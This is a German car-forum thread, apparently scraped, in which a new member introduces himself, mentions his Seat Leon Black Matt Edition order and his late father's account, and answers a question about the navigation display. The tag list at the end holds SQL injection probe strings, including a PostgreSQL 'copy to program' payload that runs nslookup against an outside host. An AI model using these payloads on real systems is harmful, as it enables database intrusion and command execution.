Der neue aus Wesseling

Diskutiere Der neue aus Wesseling im Newbie & Goodbye Forum im Bereich Andere Themen; Eine schönen guten Abend zusammen! Mein Name ist Alex, bin 34 und komme aus Wesseling. Vor firstca 2 Wochen hab ich einen Seat Leon ST FR Black...
LeonFetz

LeonFetz

Reaktionen
17
Eine schönen guten Abend zusammen!
Mein Name ist Alex, bin 34 und komme aus Wesseling.
Vor
ca 2 Wochen hab ich einen Seat Leon ST FR Black Matt Edition mit allmöglichen Kram bestellt 😃
Lieferdatum ist der 01.04.2020 bisher, kann aber tendenziell eher früher werden sagt der Freundliche...
Joa, hallo und wenn fragen sind, einfach schreiben 🙃
Schönen Abend noch!

20.12.2019

Anzeige

Gast

Schau mal hier: Der neue aus Wesseling . Dort wird jeder fündig!
Personaler

Personaler

Reaktionen
4.265
Hallo Alex,

erst mal schönen Gruß aus dem Rheinland ins Rheinland. 😃 Möge die Wartezeit kurz sein.

Aber Du bist seit 2002 User im Forum und jetzt stellst Du Dich vor. Interessant. 😉

Nytrm

Nytrm

Reaktionen
63
Ja, grüß Gott, Alex!

Ebenfalls Grüße, aber aus dem Rhein-Main-Gebiet; wobei der Fluss schiffts perfekt zu dir 😉.

Aber Du bist seit 2002 User im Forum und jetzt stellst Du Dich vor. Interessant.
Vor allem sehr beeindruckend das Passwort von damals noch zu haben/wissen!!! 👏 Ich habe zwar mittlerweile auch eine zuverlässige und ordentliche Passwortverwaltung, aber aus dem Jahre 2002 bzw. den paar Beiträgen zwischendrin ... das ist alles schon ein bissl her. Alle Achtung!

LeonFetz

LeonFetz

Reaktionen
17
Der Account war ursprünglich von meinem Dad der mir 2009 seinen Leon 1M Top Sport 20V Turbo vermachte und mir somit den Zugang zu dem Forum weitergab. Leider ist er 2010 am 24.12 verstorben.
Doch nun möchte ich Mit den zukünftigen Fahrzeug hier wieder etwas mitlesen und mitschreiben.

Personaler

Personaler

Reaktionen
4.265
Hey, sorry, nochmal willkommen aus der nördlichen Nachbarschaft von Köln und viel Spaß im Forum.

Nytrm

Nytrm

Reaktionen
63
Tut mir Leid, das mit deinem alten Herren, gerade um diese Zeit jetzt.
Aber echt Wahnsinn, dass man Forum-Accounts von Vater zu Sohn weitergibt. Da können ja richtige Foren-Dynastien gegründet werden 🧐
🎩

LeonFetz

LeonFetz

Reaktionen
17
Danke, aber wir haben gelernt damit zu leben und er hätte nicht gewollt, dass wir den Kopf in den Sand stecken.🙂
Gibt es eigentlich noch sowas wie treffen? Also Tuning technisch werde ich nichts mehr machen, aus dem Alter bin ich raus 😅

wally5080

Reaktionen
13
Mein Seat Leon ST FR Black Matt Edition kommt Januar/Februar nach aktuellem Stand.
Grüße aus Bonn!

tomtomm

tomtomm

Clubmember
Reaktionen
151
Hi Alex,
willkommen im Forum.
Das Warten auf das Fahrzeug lohnt sich.

ChrisEngel

ChrisEngel

Moderator
Reaktionen
2.938
...hier das gleiche ;)

Lollos

Reaktionen
0
Heute hab ich einen Black Matt Edition abgeholt!
Bessere Bilder werden folgen sobald das Wetter es zulässt.
Herzlichen Glückwunsch! Viel spa
Schwarz war dann doch die richtige Entscheidung bei meinem 👍🏻 Sieht sehr gut aus!

Kurze Frage die du mir bestimmt beantworten kannst: Im Konfigurator konnte man in Sachen Navigationssystem ja nichts mehr Upgrade beim Black Matt, der hatte ja das Business infotain Paket inklusive, was aber laut Preisliste nur das „normale“ Navigationssystem, aber nicht das Navi Plus beinhaltet. Bei der Konfiguration des normalen FR kann ich entweder Business Infotain, oder Navi Plus auswählen. Nun ist die Frage ob der Black Matt nun auch das Navi Plus hat oder das normale? Und vielleicht noch wichtiger ob man das Navi im Virtual Cockpit und auf dem Navi Screen gleichzeitig haben kann (geht ja meines Wissens nach nur beim Plus?).

LeonFetz

LeonFetz

Reaktionen
17
Ich hab den Wagen beim Händler konfiguriert und alles rein gepackt was geht außer DCC und dieses fangnetz.
Ich kann die Navi Karte entweder bei mir im virtuell Cockpit anzeigen oder im Radio, beides zusammen geht nicht.

• Gefällt mir
Reaktionen: Lollos

Lollos

Reaktionen
0
Ich hab den Wagen beim Händler konfiguriert und alles rein gepackt was geht außer DCC und dieses fangnetz.
Ich kann die Navi Karte entweder bei mir im virtuell Cockpit anzeigen oder im Radio, beides zusammen geht nicht.
Okay danke dir!
Schade, aber ich denke das wird mich dann doch nicht all zu sehr stören 🤷🏼‍♂️

Thema:

Der neue aus Wesseling

Der neue aus Wesseling - Ähnliche Themen

• Es nimmt kein Ende ... schon wieder ein Neuer

Es nimmt kein Ende ... schon wieder ein Neuer: Hallo zusammen, hier ein weiterer Löwen-Neuling, wenn ich uns kurz vorstellen darf: nach fast acht Jahren Audi fahren brauchte ich letztes Jahr...
  • Ein neuer 184er Dieselfahrer

Ein neuer 184er Dieselfahrer: Hallo zusammen, nach eher langem mitlesen im Forum habe ich mich mal dazu entschlossen einen Account zu machen. Mitte letzen Jahres haben wir...
  • Ein Neuer an Board

Ein Neuer an Board: Hallo zusammen Am 21.03. bekomme ich meinen Seat Leon Cupra ST 4Drive Swiss - man ist das ein langer Name😂 Nun habe ich mich hier schonmal...
  • Der Neue aus der Schweiz

Der Neue aus der Schweiz: Guten Morgen Zusammen Da ich diese Woche seeehr spontan ein Leon Cupra bestellt habe, bin ich im Internet durch Zufall auf dieses Forum...
  • Ein neuer aus Gelsenkirchen

Ein neuer aus Gelsenkirchen: Hallöchen bin der Michael bin 44jahre alt und hab mir jetzt einen 2jahre jungen Seat Leon 1.4 fr gekauft ☺️ Ich komme aus Gelsenkirchen und freue...
  • Ein neuer aus Gelsenkirchen - Ähnliche Themen

• Es nimmt kein Ende ... schon wieder ein Neuer

Es nimmt kein Ende ... schon wieder ein Neuer: Hallo zusammen, hier ein weiterer Löwen-Neuling, wenn ich uns kurz vorstellen darf: nach fast acht Jahren Audi fahren brauchte ich letztes Jahr...
  • Ein neuer 184er Dieselfahrer

Ein neuer 184er Dieselfahrer: Hallo zusammen, nach eher langem mitlesen im Forum habe ich mich mal dazu entschlossen einen Account zu machen. Mitte letzen Jahres haben wir...
  • Ein Neuer an Board

Ein Neuer an Board: Hallo zusammen Am 21.03. bekomme ich meinen Seat Leon Cupra ST 4Drive Swiss - man ist das ein langer Name😂 Nun habe ich mich hier schonmal...
  • Der Neue aus der Schweiz

Der Neue aus der Schweiz: Guten Morgen Zusammen Da ich diese Woche seeehr spontan ein Leon Cupra bestellt habe, bin ich im Internet durch Zufall auf dieses Forum...
  • Ein neuer aus Gelsenkirchen

Ein neuer aus Gelsenkirchen: Hallöchen bin der Michael bin 44jahre alt und hab mir jetzt einen 2jahre jungen Seat Leon 1.4 fr gekauft ☺️ Ich komme aus Gelsenkirchen und freue...
  • Schlagworte

testing

,

testing' AND 2*3*8=6*8 AND 'OFbP'='OFbP

,

testing" AND 2*3*8=6*8 AND "Vtye"="Vtye

,
    testing%' AND 2*3*8=6*8 AND '9WBB'!='9WBB%
    , testing';copy (select '') to program 'nslookup dns.sqli.\013405.1898-26589.1898.30249.\1.bxss.me